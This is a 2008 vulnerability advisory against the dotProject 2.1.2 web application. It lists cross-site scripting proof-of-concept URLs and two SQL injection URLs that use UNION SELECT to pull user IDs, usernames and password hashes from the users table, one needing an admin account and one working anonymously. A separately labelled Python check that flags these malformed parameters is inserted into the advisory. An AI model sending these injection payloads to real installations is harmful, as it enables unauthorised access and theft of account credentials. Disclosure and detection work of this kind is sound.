#=======================================================================#
(http://wwwlowsec.org)
#========================================================================#
Author: C1c4Tr1Z
Date: 28/08/08
Application: dotProject 2.1.2 (29/06/2008)
Product WebSite: http://www.dotproject.net/
(*) With some of these exploits you need an ADMIN/ANONYMOUS account
(*) I think that this project might be vulnerable to Cross-Site Request Forgery
#========================================================================#
#=============================[XSS]======================================#
POC:
/index.php?m=tasks&inactive=toggle">
/index.php?m=calendar&a=day_view&date=20080828">
/index.php?m=public&a=calendar&dialog=1&callback=setCalendar">
/index.php?m=ticketsmith&type=My'>
#========================================================================#
#=============================[SQL]======================================#
POC as "ADMIN":
/index.php?m=admin&a=viewuser&user_id=1 AND 1=0 UNION SELECT 1,2,concat_ws(0x3a,user_id,user_username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 FROM users
POC as "ANONYMOUS" or other:
/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users--
#========================================================================#
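Detection check for the requests above, as an added example (not part of the original advisory and not dotProject code). It flags request URLs whose user_id, tab, date, inactive, callback or type parameters carry values outside an assumed shape; the shapes are inferred from the benign parts of the PoC URLs, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed value shapes, inferred from the benign parts of the PoC URLs.
INT_PARAMS = {"user_id", "tab"}                   # ids / tab index, may be negative
DATE_PARAMS = {"date"}                            # YYYYMMDD
MARKUP_PARAMS = {"inactive", "callback", "type"}  # parameters in the XSS PoCs

INT_RE = re.compile(r"-?\d+")
DATE_RE = re.compile(r"\d{8}")
MARKUP_RE = re.compile(r"[\"'<>]")

def check_request(url):
    """Return (param, reason) findings for one request URL."""
    findings = []
    query = urlsplit(url).query
    # parse_qs percent-decodes, so encoded and raw payloads are treated alike.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in INT_PARAMS and not INT_RE.fullmatch(value):
                findings.append((name, "non-integer value"))
            elif name in DATE_PARAMS and not DATE_RE.fullmatch(value):
                findings.append((name, "not YYYYMMDD"))
            elif name in MARKUP_PARAMS and MARKUP_RE.search(value):
                findings.append((name, "quote or angle bracket"))
    return findings

def scan(urls):
    """Map each flagged URL to its findings; clean URLs are omitted."""
    return {u: f for u in urls if (f := check_request(u))}

# Constructed sample request lines (as they would appear in an access log).
SAMPLE = [
    "/index.php?m=projects&tab=1",
    "/index.php?m=projects&tab=-1%20UNION%20SELECT%201,2%20FROM%20users--",
    "/index.php?m=admin&a=viewuser&user_id=1",
    "/index.php?m=calendar&a=day_view&date=20080828%22%3E",
    "/index.php?m=ticketsmith&type=My%27%3E",
    "/index.php?m=ticketsmith&type=My",
]

if __name__ == "__main__":
    for url, findings in scan(SAMPLE).items():
        print(url, findings)
```

The same shape checks, applied server-side before the values reach a query or the page output, reject every PoC request listed above.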
#========================================================================#
Contact: C1c4Tr1Z
(http://wwwlowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#